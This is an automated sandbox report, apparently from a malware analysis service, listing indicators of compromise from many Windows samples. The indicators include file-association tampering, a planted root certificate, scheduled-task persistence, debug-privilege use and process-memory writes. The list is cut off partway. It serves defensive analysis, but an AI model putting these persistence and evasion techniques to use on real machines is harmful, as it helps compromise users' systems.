\REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main 3.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\12\IEPropFontName = "Raavi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6 reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "115" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "121" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "2752" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" reg.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE -
Modifies registry class 28 IoCs
Processes:
jaffa.exendrhuzubnp.exe3.exerundll32.exerundll32.exedescription ioc Process Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" ndrhuzubnp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" ndrhuzubnp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ndrhuzubnp.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\shell\open 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_00df5a15-f737-4731-9c1e-f4d2bd2a2f28\\bloatware\\3.exe\" -- \"%1\"" 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6ACEF9B1FE14F298837A3B4086983E99B08102884215034FE1CB42EC08A5" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E7FD68C3FF6C22DBD10CD0A58A0B9013" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "1939C7781490DAB4B8BE7C92ED9434CB" jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat ndrhuzubnp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc ndrhuzubnp.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon 3.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\shell 3.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_Classes\Local Settings rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2FB5B12047E7389852C8BAD63393D7CF" jaffa.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\ = "URL:psiphon" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_CLASSES\psiphon\URL Protocol 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh ndrhuzubnp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ndrhuzubnp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ndrhuzubnp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "33342C7C9D5283576D4277A177232CDC7D8065D9" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7EFAFF8E482885699042D72B7D93BD95E636593566366337D6EA" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" ndrhuzubnp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf ndrhuzubnp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs ndrhuzubnp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg ndrhuzubnp.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000_Classes\Local Settings rundll32.exe -
Processes:
psiphon-tunnel-core.exedescription ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd psiphon-tunnel-core.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 psiphon-tunnel-core.exe -
NTFS ADS 1 IoCs
Processes:
notepad.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe:ZoneIdentifier notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 19 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid Process 3992 PING.EXE 1200 PING.EXE 2592 PING.EXE 1604 PING.EXE 936 PING.EXE 1160 PING.EXE 2816 PING.EXE 2760 PING.EXE 3488 PING.EXE 3020 PING.EXE 3480 PING.EXE 3528 PING.EXE 468 PING.EXE 3768 PING.EXE 3020 PING.EXE 3980 PING.EXE 3608 PING.EXE 1884 PING.EXE 2404 PING.EXE -
Runs regedit.exe 1 IoCs
Processes:
regedit.exepid Process 1704 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 4040 schtasks.exe 1176 schtasks.exe 3104 schtasks.exe 3684 schtasks.exe 2228 schtasks.exe 1620 schtasks.exe 1168 schtasks.exe 3088 schtasks.exe 2484 schtasks.exe 3676 schtasks.exe 2560 schtasks.exe 3820 schtasks.exe 2884 schtasks.exe 3376 schtasks.exe 3084 schtasks.exe 3876 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
vlc.exeWINWORD.EXEsjhkhda.exepid Process 1372 vlc.exe 920 WINWORD.EXE 4052 sjhkhda.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WinaeroTweaker-1.40.0.0-setup.tmppowershell.exeiexplore.exe!FIXInj.exejaffa.exejkka.exendrhuzubnp.exegjiuvdvi.exebupqjacxngvmelo.exepid Process 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3496 WinaeroTweaker-1.40.0.0-setup.tmp 3708 powershell.exe 1696 iexplore.exe 1696 iexplore.exe 2444 !FIXInj.exe 2444 !FIXInj.exe 2444 !FIXInj.exe 2444 !FIXInj.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 2840 jkka.exe 2840 jkka.exe 2840 jkka.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 3592 bupqjacxngvmelo.exe 3592 bupqjacxngvmelo.exe 3592 bupqjacxngvmelo.exe 3592 bupqjacxngvmelo.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
vlc.exerundll32.exeIEXPLORE.EXE!FIXInj.exepid Process 1372 vlc.exe 3896 rundll32.exe 3384 IEXPLORE.EXE 2444 !FIXInj.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
sjhkhda.exepid Process 2412 sjhkhda.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exetaskkill.exeRover.exetaskkill.exetaskkill.exetaskkill.exescary.exeRomilyaa.exepowershell.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exetaskkill.exeRomilyaa.exeSolaraBootstrapper.exeUmbral.exewmic.exeRomilyaa.exe!FIXInj.exedescription pid Process Token: SeDebugPrivilege 984 tasklist.exe Token: SeDebugPrivilege 2316 taskkill.exe Token: SeDebugPrivilege 2420 Rover.exe Token: SeDebugPrivilege 3676 taskkill.exe Token: SeDebugPrivilege 3684 taskkill.exe Token: SeDebugPrivilege 1628 taskkill.exe Token: SeDebugPrivilege 3620 scary.exe Token: SeDebugPrivilege 3128 Romilyaa.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 3852 Romilyaa.exe Token: SeDebugPrivilege 4084 Romilyaa.exe Token: SeDebugPrivilege 3080 Romilyaa.exe Token: SeDebugPrivilege 3756 Romilyaa.exe Token: SeDebugPrivilege 1672 Romilyaa.exe Token: SeDebugPrivilege 3708 taskkill.exe Token: SeDebugPrivilege 3172 Romilyaa.exe Token: SeDebugPrivilege 3112 SolaraBootstrapper.exe Token: SeDebugPrivilege 1484 Umbral.exe Token: SeIncreaseQuotaPrivilege 3160 wmic.exe Token: SeSecurityPrivilege 3160 wmic.exe Token: SeTakeOwnershipPrivilege 3160 wmic.exe Token: SeLoadDriverPrivilege 3160 wmic.exe Token: SeSystemProfilePrivilege 3160 wmic.exe Token: SeSystemtimePrivilege 3160 wmic.exe Token: SeProfSingleProcessPrivilege 3160 wmic.exe Token: SeIncBasePriorityPrivilege 3160 wmic.exe Token: SeCreatePagefilePrivilege 3160 wmic.exe Token: SeBackupPrivilege 3160 wmic.exe Token: SeRestorePrivilege 3160 wmic.exe Token: SeShutdownPrivilege 3160 wmic.exe Token: SeDebugPrivilege 3160 wmic.exe Token: SeSystemEnvironmentPrivilege 3160 wmic.exe Token: SeRemoteShutdownPrivilege 3160 wmic.exe Token: SeUndockPrivilege 3160 wmic.exe Token: SeManageVolumePrivilege 3160 wmic.exe Token: 33 3160 wmic.exe Token: 34 3160 wmic.exe Token: 35 3160 wmic.exe Token: SeIncreaseQuotaPrivilege 3160 wmic.exe Token: SeSecurityPrivilege 3160 wmic.exe Token: SeTakeOwnershipPrivilege 3160 wmic.exe Token: SeLoadDriverPrivilege 3160 wmic.exe Token: SeSystemProfilePrivilege 3160 wmic.exe Token: SeSystemtimePrivilege 3160 wmic.exe Token: SeProfSingleProcessPrivilege 3160 wmic.exe Token: SeIncBasePriorityPrivilege 3160 wmic.exe Token: SeCreatePagefilePrivilege 3160 wmic.exe Token: SeBackupPrivilege 3160 wmic.exe Token: SeRestorePrivilege 3160 wmic.exe Token: SeShutdownPrivilege 3160 wmic.exe Token: SeDebugPrivilege 3160 wmic.exe Token: SeSystemEnvironmentPrivilege 3160 wmic.exe Token: SeRemoteShutdownPrivilege 3160 wmic.exe Token: SeUndockPrivilege 3160 wmic.exe Token: SeManageVolumePrivilege 3160 wmic.exe Token: 33 3160 wmic.exe Token: 34 3160 wmic.exe Token: 35 3160 wmic.exe Token: SeDebugPrivilege 3608 Romilyaa.exe Token: SeDebugPrivilege 2444 !FIXInj.exe Token: 33 2444 !FIXInj.exe Token: SeIncBasePriorityPrivilege 2444 !FIXInj.exe Token: 33 2444 !FIXInj.exe Token: SeIncBasePriorityPrivilege 2444 !FIXInj.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
iexplore.exeefsui.exeiexplore.exeWinaeroTweaker-1.40.0.0-setup.tmp3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exevlc.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exef3cb220f1aaa32ca310586e5f62dcab1.exeiexplore.exeiexplore.exeiexplore.exeRomilyaa.exejaffa.exendrhuzubnp.exegjiuvdvi.exebupqjacxngvmelo.exekihaslfgtkziw.exegjiuvdvi.exepid Process 2972 iexplore.exe 1728 efsui.exe 1728 efsui.exe 1728 efsui.exe 1696 iexplore.exe 3496 WinaeroTweaker-1.40.0.0-setup.tmp 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 1696 iexplore.exe 3128 Romilyaa.exe 3852 Romilyaa.exe 4084 Romilyaa.exe 3080 Romilyaa.exe 3756 Romilyaa.exe 1672 Romilyaa.exe 3172 Romilyaa.exe 1372 vlc.exe 1372 vlc.exe 1372 vlc.exe 3608 Romilyaa.exe 1372 vlc.exe 1640 Romilyaa.exe 804 Romilyaa.exe 3476 Romilyaa.exe 2236 3.exe 2592 Romilyaa.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3680 iexplore.exe 3560 iexplore.exe 3368 iexplore.exe 3112 Romilyaa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 3316 kihaslfgtkziw.exe 3316 kihaslfgtkziw.exe 3316 kihaslfgtkziw.exe 2116 gjiuvdvi.exe 2116 gjiuvdvi.exe 2116 gjiuvdvi.exe 3560 iexplore.exe -
Suspicious use of SendNotifyMessage 55 IoCs
Processes:
efsui.exe3.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exevlc.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exeRomilyaa.exef3cb220f1aaa32ca310586e5f62dcab1.exeRomilyaa.exejaffa.exendrhuzubnp.exegjiuvdvi.exebupqjacxngvmelo.exekihaslfgtkziw.exegjiuvdvi.exepid Process 1728 efsui.exe 1728 efsui.exe 1728 efsui.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 2236 3.exe 3128 Romilyaa.exe 3852 Romilyaa.exe 4084 Romilyaa.exe 3080 Romilyaa.exe 3756 Romilyaa.exe 1672 Romilyaa.exe 3172 Romilyaa.exe 1372 vlc.exe 1372 vlc.exe 3608 Romilyaa.exe 1372 vlc.exe 1640 Romilyaa.exe 804 Romilyaa.exe 3476 Romilyaa.exe 2236 3.exe 2592 Romilyaa.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3976 f3cb220f1aaa32ca310586e5f62dcab1.exe 3112 Romilyaa.exe 864 jaffa.exe 864 jaffa.exe 864 jaffa.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1320 ndrhuzubnp.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 1364 gjiuvdvi.exe 3592 bupqjacxngvmelo.exe 3316 kihaslfgtkziw.exe 3316 kihaslfgtkziw.exe 3316 kihaslfgtkziw.exe 2116 gjiuvdvi.exe 2116 gjiuvdvi.exe 2116 gjiuvdvi.exe -
Suspicious use of SetWindowsHookEx 52 IoCs
Processes:
iexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXE3.exeIEXPLORE.EXERomilyaa.exeIEXPLORE.EXEvlc.exeiexplore.exeiexplore.exeiexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEWINWORD.EXEsjhkhda.exepid Process 2972 iexplore.exe 2972 iexplore.exe 2604 IEXPLORE.EXE 2604 IEXPLORE.EXE 1696 iexplore.exe 1696 iexplore.exe 1424 IEXPLORE.EXE 1424 IEXPLORE.EXE 2236 3.exe 2236 3.exe 1696 iexplore.exe 1696 iexplore.exe 2380 IEXPLORE.EXE 2380 IEXPLORE.EXE 3128 Romilyaa.exe 2380 IEXPLORE.EXE 2380 IEXPLORE.EXE 3804 IEXPLORE.EXE 3804 IEXPLORE.EXE 1372 vlc.exe 3804 IEXPLORE.EXE 3804 IEXPLORE.EXE 1696 iexplore.exe 1424 IEXPLORE.EXE 1424 IEXPLORE.EXE 3680 iexplore.exe 3680 iexplore.exe 3368 iexplore.exe 3368 iexplore.exe 3560 iexplore.exe 3560 iexplore.exe 3668 IEXPLORE.EXE 3668 IEXPLORE.EXE 3452 IEXPLORE.EXE 3452 IEXPLORE.EXE 3728 IEXPLORE.EXE 3728 IEXPLORE.EXE 3452 IEXPLORE.EXE 3452 IEXPLORE.EXE 3384 IEXPLORE.EXE 3384 IEXPLORE.EXE 920 WINWORD.EXE 920 WINWORD.EXE 4052 sjhkhda.exe 3384 IEXPLORE.EXE 3384 IEXPLORE.EXE 3728 IEXPLORE.EXE 3728 IEXPLORE.EXE 3668 IEXPLORE.EXE 3668 IEXPLORE.EXE 2604 IEXPLORE.EXE 2604 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
